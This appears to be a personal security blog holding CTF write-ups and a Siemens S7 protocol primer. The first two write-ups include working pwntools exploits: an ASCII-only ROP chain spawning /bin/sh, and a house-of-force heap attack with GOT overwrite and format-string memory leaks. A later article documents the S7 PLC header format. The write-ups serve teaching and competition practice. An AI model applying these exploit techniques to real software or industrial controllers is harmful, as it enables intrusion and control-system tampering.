This has been a fairly straightforward challenge. We were given with a binary that had a textbook buffer overflow with no canaries and NX enabled. The only twist in the story was the input filtering which only allowed ASCII characters. Each byte had to be between 0x20 and 0x7f otherwise the program terminated. This meant that the challenge boiled down to crafting a ROP chain that only contains the “good” characters.

Lucky for us, the program mmaped the provided libc.so to the ASCII friendly 0x5555e000 address. This map was going to serve our only source of ROP gadgets as the program binary itself was loaded on a bad address. I began solving the problem by getting a list of the available libc calls that reside on good addresses. The nm –dynamic libc.so command can be used to list exported symbols and I quickly put together a little python script to filter the results.

#!/usr/bin/python2
import sys

with open('functions.list') as f:
    for line in f:
        try:
            address = int(line.split()[0], 16) + 0x5555e000
        except ValueError:
            continue
        test = address
        try:
            for i in range(4):
                lbyte = (test & 0xff)
                if lbyte <= 0x1f or lbyte >0x7e:
                    raise ValueError('shit happens')
                test = test>>8
        except ValueError:
            continue
        sys.stdout.write(hex(address)+'/'+line) #line.split(' ', 1)[1])

Unfortunately neither the system function nor the /bin/sh string was at a good address so I had to look for something else. It stuck to me that the gets function was available which could be used to overwrite my buffer with unfiltered data. This approach was a dead end and I briefly explain why. gets requires a single parameter a pointer to read to, which ,since this challenge was written on i386, is passed on the stack. I ideally wanted to overwrite the stack buffer so I had to push the ESP onto the stack, which seemed fairly easy to do. I quickly put together the ROP chain and then I realised that none of the libc variables are initialized. This is obviously not the real libc, just an mmaped binary blob, which means that libc init was never called and all the variables such as stdin pointer, env pointer are left as null. This of course breaks most of the libc function calls.

So I had to come up with a different approach relying only on system calls, or wrappers that do not use any of the aforementioned variables. My plan B became jumping to a call execve instruction with the correct parameters set up (I could not just jump to execve since it was on a bad address). The problem was that execve requires a pointer to the /bins/sh string, which is on a bad address, and two null pointers (for env and arg) which again cannot be directly supplied. So I had to set up these parameters in registers and push them on the stack in the right order then call execve.

I used ROPgadget –all to gather the gadgets and filtered the output the same way as I filtered the symbol list. I have spent some time looking through the gadgets to figure out where and how I could set up the parameters and then I found the pusha gadget. pusha pushes all the general purpose registers onto the stack in the following order EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. This was perfect for me all that was left to do:

  • set EAX to 0 as it is going to be the env pointer
  • set ECX to 0 as the arg pointer
  • calculate the address of /bin/sh in EDX
  • put the address of call execve in EBX
  • set the address of the next gadget in EDI which was going to be executed after the pusha, this gadget should pop off 3 items from the stack (former ESP, EDI, ESI) so that the call execve gets executed

There were pop edi and pop ebx gadgets so setting those up was trivial, just as well as setting EAX to null with a xor eax eax gadget. ECX was set to null with and xchg eax, ecx gadget and EDX was calculated with an add eax, 0xc35b0000 and sub edx, eax gadgets, setting EAX and EDX appropriately beforehand (/bin/sh: 0x556bb7ec = 0x3a212121-(0xc35b0000+0x215a6935)). The actual exploit code is really messy and I am too lazy to clean it up, so I am just gonna copy it here as is. I hope this explanation makes up for it. The ROP chain worked like a charm after spending considerable amount of time piecing it together, the flag was:

flag{Asc11_ea3y_d0_1t???}
if __name__ == "__main__":
    c = remote(IP, PORT)

    binsh = 0x556bb7ec

# 0x556d2a51/0x00174a51 : pop ecx ; add al, 0xa ; ret
    popecx = 0x556d2a51
# hex((0x3a212121-(0xc35b0000+0x215a6935))&0xffffffff)
    edxval = 0x3a212121
    ecxval = 0x215a6935
# 0x555f3555/0x00095555 : pop edx ; xor eax, eax ; pop edi ; ret
    popedx = 0x555f3555 # 0 eax popedi
    filler = 'CCCC'
# 0x556a6253/0x00148253 : mov eax, ecx ; ret
    moveaxecx = 0x556a6253
# 0x5557734b/0x0001934b : add eax, 0xc35b0000 ; ret
    addieax = 0x5557734b
# 0x5560365c/0x000a565c : sub edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
    subedxeax = 0x5560365c #pop esi,edi, ebp trash eax
    
    # Set up bin sh addr in edx
    payload = 'A'*32 +p32(popecx) + p32(ecxval)\
        + p32(popedx) + p32(edxval) + filler \
        + p32(moveaxecx)+p32(addieax) + p32(subedxeax) +filler*3
  

# 0x55617a5f/0x000b9a5f : xchg eax, ecx ; mov eax, 0xff ; jne 0xb9a41 ; ret
    xchgeaxecx = 0x55617a5f
# 0x555f6428/0x00098428 : xor eax, eax ; ret
    xoreax = 0x555f6428
    # Set null in ecx and eax
    payload += p32(xoreax) + p32(xchgeaxecx) + p32(xoreax)


# 0x555f2166/0x00094166 : pop ebx ; pop edi ; ret
    popebxedi = 0x555f2166
    callexecve = 0x55616967
    
    # Set up ebx and edi
    # the subedxeax gadget pops esi, edi, ebp so 
    #it is used to position the stack after the pusha
    payload += p32(popebxedi) + p32(callexecve) + p32(subedxeax)

# pushal; ret; -> returns edi
    pushal = 0x5563704c
    # pushall
    payload += p32(pushal)
 
    #print hexdump(payload)
    payload += 'B'*(2398-len(payload))
    #sys.stdout.write(payload)
    #sys.stdout.flush()
    c.sendline(payload)

    c.interactive()

I solved this challenge with the help of my teammate @KT. The required technique and vulnerabilities in this challenge are very similar to the bcloud (pwn 150) exercise I solved this one first so I try to describe them here. I might add a writeup for the other challenge too, if I have the time.

$ ./checksec.sh --file ruin
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   ruin

We were given with an ARM (EABI-5) binary, which we immediately loaded up in IDA. The source code is pretty simple so the reversing was pretty straight forward, the Hex-Rays decompiler makes it even easier. The program reads a key and if it is correct we are presented with a menu where we can write strings into three different buffers.

The vulnerabilities were pretty obvious in the binary. The first one is in the key read method at the very beginning, it reads 8 characters into an 8 byte array on the .bss than prints it if it is not the right key.

printf("please input your 8-bit key:");
fread(g8bitKeySecurity, 1u, 8u, (FILE *)stdin);
if ( !strncmp(g8bitKeySecurity, "security", 8u) )
   break;
printf("%s is wrong, try again!\n", g8bitKeySecurity);

Luckily there is a heap pointer right after the buffer on the .bss so if we provide an 8 characters long invalid key we have our heap leak, which will be crucial later.

The second vuln is in the edit secret function which allocates an 8 byte long buffer than reads 24 bytes into it.

if ( !gSecretBOF )
  gSecretBOF = (char *)malloc(8u);
printf("please input your secret:");
return fgets(gSecretBOF, 24, (FILE *)stdin);

The third vuln is in the sign name function which only checks the upper bound of the supplied integer that later is converted to unsigned. This allows us to allocate arbitrarily large buffer.

So what we have at this point is a heap leak, a binary with no relro and no PIE, a heap buffer that overflows, arbitrary user controlled heap allocation and a third buffer that we can write. This screams house of force (note: a good resource to look for heap exploits is How2Heap by shellphish that also explains and demonstrates house of force in detail).

During house of force we overwrite the size of the wilderness (the size of the last free chunk) to be extremely large so we can allocate huge buffers on the chunked (brk) heap and avoid calling mmap. This way we can move the “end of the heap” to an arbitrary location in the memory and control the next allocation. Since there is no full-relro and there is no PIE we can overwrite .got.plt to gain IP control. To position the “heap end” to the got we have to allocate target_address - 2*pinter_size - heap_current_top sized buffer.

## Leak the heapbase
connect = c
c.recvuntil(":")
c.send("xxxxxxxx")
leak = c.recvuntil(':')
print hexdump(leak[8:12])
heapbase = u32(leak[8:12]) - 8
c.send("security")
c.recvuntil(":")

## Overwrite last chunk free space
LAST_CHUNK_SIZE= "\xff"*4 + "\xff"*4
FILL="\x00"*8
sendData(c, 2, ["A"*8+LAST_CHUNK_SIZE+FILL])
print "Wilderness Set Up"
c.send('\n')
c.recvuntil(':')

## Position the "heap end"
heap_top = heapbase + 20
target = e.got['exit']
print hex(target)
address = target - 8 - heap_top
print str(address)
OFFSET_TO_GOT= str(address) + 'A'* (32 -len(str(address)))
sendData(c, 3, [OFFSET_TO_GOT,"A"*10+"\n"])

Our third controlled buffer is 16 bytes long plus the 8 bytes of the chunk header so we would overwrite 24 bytes on the .got.

.got:00010F74 __libc_start_main_ptr DCD __imp___libc_start_main
.got:00010F74                                         ; DATA XREF: __libc_start_main+8r
.got:00010F78 __gmon_start___ptr DCD __imp___gmon_start__ ; DATA XREF: __gmon_start__+8r
.got:00010F7C exit_ptr        DCD __imp_exit          ; DATA XREF: exit+8r
.got:00010F80 atoi_ptr        DCD __imp_atoi          ; DATA XREF: atoi+8r
.got:00010F84 strncmp_ptr     DCD __imp_strncmp       ; DATA XREF: strncmp+8r
.got:00010F88 abort_ptr       DCD __imp_abort         ; DATA XREF: abort+8r

A good target to overwrite is atoi because we can directly supply a string as its parameter and has enough space before and after it. Now that we have IP control we need an address to jump to, however we dont yet have the libc base address and the libc version. At this point we decided to overwrite atoi with the .plt address of the printf stub to leak further information.

## leak libc base
c.send("%21$p|%22$p/\n")
libc = c.recvuntil('/')[:-1]
start = int(libc.split('|')[0], 16)
segment = int(libc.split('|')[1], 16)
print hex(start)
print hex(segment)

## Overwrite got
PAYLOAD_ADDR=p32(0x8594)
sendData(c, 1, [PAYLOAD_ADDR+ "\x00"* (16-len(PAYLOAD_ADDR))])

Fortunately there are libc adresses on the stack that we can read, so we only need the address of system. With our printf we have arbitrary read from the entire memory thus we can search libc for the system export symbol, this can be further simplified with pwntools DynELF lookup. The only problem is that the printf input is read by fgets which terminates on null byte, so we cant directly read addresses containing 0x00 byte. This is not a huge problem because we can still read from the previous or next address and identify the ELF header.

def leaker(addr):
    sys.stdout.write(hex(addr) + ': ')
    if addr%0x100 == 0:
        print "upppss..."
        if not '000' in '%02x'%(addr + 1):
            testVal = leaker(addr + 1)
            if testVal[0:3] == "ELF":
                return "\x7f" + testVal
            else:
                return leaker(addr - 1)
        else:
            return leaker(addr - 1)
    else:
        connect.send(p32(addr) + "%5$s\n")
        data = connect.recvuntil('\nwrong')[4:-6]
        if data == "":
            data += "\x00"
        print '%r' % data
        dump = connect.recvuntil(':')
        return data

d = DynELF(leaker, start)
system = d.lookup('system')
print 'system = %r' % system

At this point we have evrything we need, we just have to rewrite the original atoi address to the leaked system address. One little thing is that we have overwritten the atoi which return value is used to navigate the menu, luckily we can use the printf to navigate by sending as many characters as the menu option we want to hit (the printf returns the number of printed bytes). Finally we just have to send the “\bin\sh” input to system and we have our remote shell, to read the flag.

BCTF{H0w_3lf_Ru1n3d_XmaS}

The complete exploit is availabe here (disclaimer: it was written under CTF circumstances and it might disturb seasoned coders). I think the challange was all right, however it really did not make any difference that it was ARM (besides making a tiny bit harder to figure out the libc version). I was looking for some ARM/Thumb mode switching ROP chain writing or something specific for the architecture, which was not needed to solve the challange. Still I had fun and thanks for the organizers for the challenge.

In this reversing exercise we are given with an unstripped 64-bit ELF file. Reversing the binary is fairly simple just load it in IDA or hopper and you pretty much have the source code. Before I started working on the task my team mate @sghctoma has already rewritten the program in C and extracted the “constants” array. The source code of the program:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <gmp.h>

#include "defs.h"

void factor_print(mpz_t a1)
{
    mpz_t v5;
    char c;

    mpz_init_set(v5, a1);

    for (int i = 0; i <= 171; ++i) {
        c = 0;
        while (mpz_divisible_ui_p(v5, primes[i])) {
            mpz_tdiv_q_ui(v5, v5, primes[i]);
            ++c;
        }
        if (!c) break;
        putchar(c); of the 
    }
    putchar('\n');
}

int main(int argc, char* argv[])
{
    mpz_t v10, v11, v14, v15;
    size_t size = 172;

    mpz_init(v10);
    mpz_init(v11);
    mpz_init(v14);
    mpz_init(v15);

    mpz_set_ui(v15, 1019);

    char* line = (char*)malloc(size);
    size_t s = getline(&line, &size, stdin);
    line[s - 1] = 0;

    // v15 = 1019 * primes[0]^line[0] * primes[1]^line[1] .. primes[limit]^line[limit]
    double limit = fmin((double)s, 84.0);
    for (int i = 0; (double)i < limit; ++i) {
        mpz_set_ui(v14, primes[i]);
        mpz_pow_ui(v14, v14, line[i]);
        mpz_mul(v15, v15, v14);
    }
    // if v15 = fractions[338], or v15 == fractions[339] at this point
    // we get the congratz message.
    int cont;
    int i = 0;
    do {
        cont = 0;
        for (int j = 0; j < 423; ++j) {
            gmp_sscanf(fractions[2 * j], "%Zi", v11);
            gmp_sscanf(fractions[2 * j + 1], "%Zi", v10);
            mpz_set(v14, v15);
            mpz_mul(v14, v14, v11);
            if (mpz_divisible_p(v14, v10)) {
                mpz_tdiv_q(v15, v14, v10);
                cont = 1;
                break;
            }
        }
        i++;
    } while(cont);

    factor_print(v15);
}

The defs.h contains the definition of the primes array which contains the first 172 prime number. The fractions array contain a set of integers that can be factorized with the given prime numbers.

If we go through the code we can see that we have to insert a number by providing the exponents of its prime fractions, however we can only use the first 83 prime numbers. Then the program multiplies this number with 1019 (which is the 171st prime) and runs it through a series of transformation and prints the result. If the result of the transformation is fractions[339] than we get the Congratulations message.

The transformation is the following, it iterates every second number in the fractions array and multiplies the input with it and stores the result in a temporary variable. If the result can be divided with the next number in the fractions[] array than the result is stored as the next input and the cycle goes on. If no division happens the cycle ends and the result is printed.

At this point it is clear that we are looking at a VM that stores its state in an integer with its prime fractions. We can look at this state as the sum of 172 unique bins, each of these bins holding zero or more tokens. The bins are identified by the corresponding prime fraction and the tokens are represented as the exponent of that fraction. The “instructions” try to push some tokens into given bins than try to pop some other tokens, if the pop is successful the instruction is executed otherwise nothing happens (the push is reverted). If no instruction can be executed the final state is printed.

Printing all the states in the fractions array shows that we want the inner state to be fractions[338] or fractions[339], because state 338 is directly transformed into 339 in the next cycle. Unfortunately none of these can be factorized using only the first 83 primes, so we have to take a closer look at the actual instructions. I have written a small python snippet that factorizes all the number pairs in the fractions array and prints which bins and tokens are affected, in the following format:

index inst  count/address
.
.
.
346   pop:  75/0 1/170
      push:  1/171 1/84

352   pop:  69/1 1/170
      push:  1/171 1/85

358   pop:  89/2 1/170
      push:  1/86 1/171

364   pop:  123/3 1/170
      push:  1/87 1/171

370   pop:  40/4 1/170
      push:  1/88 1/171

376   pop:  66/5 1/170
      push:  1/89 1/171

382   pop:  1/170 121/6
      push:  1/90 1/171
.
.
.

By examining the instructions we can see that the 167+ bins are used for control tokens and that the first 165 instructions is pretty much only used to get an arbitrary state into the “wrong solution” state. The really interesting part is the 170th instruction and above every third instruction is used to pop tokens from the first 83 bins and push tokens into each 84-166 bins. This is exactly what is required to reach state “fractions[338]” and get the win message. I have written the following little python script to calculate the correct input:

def prime_factors(n):
    i = 2
    factors = []
    while i * i <= n:
        if n % i:
            i += 1
        else:
            n //= i
            factors.append(i)
    if n > 1:
        factors.append(n)
    return factors

def get_solution(num):
    fact = prime_factors(num)
    res = dict()
    for p in fact:
        i = primes.index(p)
        if str(i) in res:
            res[str(i)] += 1
        else:
            res[str(i)] = 1
    ret = ""
    for k in res:
        if k != "170":
           return res[str(k)]
    return ret
    
with open("solution.txt", "wb") as f:
    for i in range(346, len(frac)-2, 6):
        f.write(chr(get_solution(int(frac[i+1]))))
    f.write('\n')

And the result was KEY{(By the way, this challenge would be much easier with a cybernetic frog brain)} those are the correct initial token values for the first 83 bins. At this point we just had to calculate the md5 sum of the string and get the real flag BKPCTF{db7365f3ff8887aa315d79361651627f}.

I think this challenge wasn’t one particularly hard to solve, however it was real fun. I really liked the idea of storing program state as prime fractions, thanks for the organizers for the challenge.

I have been working with Siemens PLCs for quite some time, mostly developing applications that either communicate with them or observe/simulate their communication. I thought it would be time to share my gathered knowledge of the S7 protocol as some might find it useful, interesting. The purpose of this writing is to aid those who wish to gain a deeper understanding of the Siemens S7 communication protocol and help the development of software interfering with these devices. This documentation of the protocol is not comprehensive, there are many parts left to be uncovered. While writing this article I only had access to S-300 and S-400 series devices (S315-2A and S417 to be specific) and I had never worked with S-200/S-1200/S-1500 series PLCs before, thus functions specific to those are not covered here.

As far as I know, there is no publicly available documentation for the S7 protocol, however there are a few notable projects that help to deal with it. Davide Nardella has created a fantastic open source communication library the Snap7, which implements basic communication scenarios. The library comes with the extensive documentation of the basic structure of the S7 protocol. Another great project is the S7 Wireshark dissector by Thomas W. which covers most of the protocol and its source code contains a lengthy list of protocol constants. These proved to be invaluable for me during the years I have spent working with Siemens equipment. Since, there is no official documentation, official terminology does not exists when it comes to the S7 protocol. In the rest of this document I try to comply with the terms used in the above mentioned projects.

Edit: Since I wrote this article I learned about a new and actively developed open-source project, plc4x. The project provides implementation for multiple industrial protocols including the S7 protocol.

1. The Siemens Communication Scenario

Before going into more technical details first I’d like to briefly introduce the basic Siemens communication theater. When I talk about the “S7 protocol” I refer to the Ethernet S7 communication that is mainly used to connect the PLCs to the (I)PC stations (PG/PC - PLC communication). This is not to be confused with the different fieldbus protocols that the Siemens equipment use, such as MPI, Profibus, IE and Profinet (which is an Ethernet based protocol used to connect PLCs to IO modules, not the management protocol of the devices).

Most of the time the Siemens communication follows the traditional master-slave or client-server model, where the PC (master/client) sends S7 requests to the field device (slave/server). These requests are used to query from or send data to the device or issue certain commands. There are a few exceptions when a PLC can be the communication master, with FB14/FB15 the device can initiate GET and PUT requests to other devices.

In the S400 series a so called Cyclic Data I/O function is implemented, this resembles to the traditional publisher-subscriber model. The PC can subscribe to certain events, than the PLC periodically pushes the requested data to the network. There is also a Partner or peer-to-peer model, when an Active Partner requests a connection and calls Block Send while at the same time the Passive Partner calls the Block Receive method.

For more information on the general overview of the S7 communication see the Siemens Simatic Net and Snap7 documentation.

2. The S7 PDU

The S7 protocol TCP/IP implementation relies on the block oriented ISO transport service. The S7 protocol is wrapped in the TPKT and ISO-COTP protocols, which allows the PDU (Protocol Data Unit) to be carried over TCP. The ISO over TCP communication is defined in RFC1006, the ISO-COTP is defined in RFC2126 which is based on the ISO 8073 protocol (RFC905).This structure is presented in the figure below.

S7ProtoStructure

The S7 protocol is function/command oriented which means a transmission consist of an S7 request and an appropriate reply (with very few exceptions). The number of the parallel transmission and the maximum length of a PDU is negotiated during the connection setup.

The S7 PDU consists of three main parts:

  • Header: contains length information, PDU reference and message type constant
  • Parameters: the content and structure greatly varies based on the message and function type of the PDU
  • Data: it is an optional field to carry the data if there is any, e.g. memory values, block code, firmware data …etc.

2.1 Header

The header is 10-12 bytes long, the Acknowledgement messages contain two extra error code bytes. Other than that the header format is consistent across all the PDUs.

S7HeaderStructure

Fields:

  • Protocol ID:[1b] protocol constant always set to 0x32
  • Message Type:[1b] the general type of the message (sometimes referred as ROSCTR type)
    • 0x01-Job Request: request sent by the master (e.g. read/write memory, read/write blocks, start/stop device, setup communication)
    • 0x02-Ack: simple acknowledgement sent by the slave with no data field (I have never seen it sent by the S300/S400 devices)
    • 0x03-Ack-Data: acknowledgement with optional data field, contains the reply to a job request
    • 0x07-Userdata: an extension of the original protocol, the parameter field contains the request/response id, (used for programming/debugging, SZL reads, security functions, time setup, cyclic read..)
  • Reserved:[2b] always set to 0x0000 (but probably ignored)
  • PDU reference:[2b] generated by the master, incremented with each new transmission, used to link responses to their requests, Little-Endian (note: this is the behaviour of WinCC, Step7, and other Siemens programs, it could probably be randomly generated, the PLC just copies it to the reply)
  • Parameter Length:[2b] the length of the parameter field, Big-Endian
  • Data Length:[2b] the length of the data field, Big-Endian
  • (Error class):[1b] only present in the Ack-Data messages, the possible error constants are listed in the constants.txt
  • (Error code):[1b] only present in the Ack-Data messages, the possible error constants are listed in the constants.txt

The rest of the message greatly depends on the Message Type and function code I will be covering each of those in the upcoming articles. Part 2 will focus on Job Requests and Ack-Data messages. Part 3 will cover the different **Userdata** functions and their structures.

All the different protocol constants are collected in the constants.txt.

I plan to keep these writings updated as much as possible, so if you have anything to add or correct feel free to contact me or leave a comment.

Update 2018-04-08:

  • Added reference to plc4x
  • Added link to the second part

Update 2017-03-14:

  • I have added a git repo with various thematic network captures of S7 communication click here
  • I am no longer working with Siemens equipment however due to the interest in the topic I have started writing part 2 of this article. Since I have no access to real devices it is going to be based on the different traffic captures I have laying around and my memories. Expect more gaps to fill
  • I have limited experience dealing with userdata messages (other than SZL reads and cyclic updates they are mostly used for development, programming and debugging purposes) so I am not sure if I can cover them in a meaningful way based on the few pcaps I have

This is my personal blog, where I plan to publish different CTF writeups and (mostly) ICS cyber security related articles. Right now it is under construction.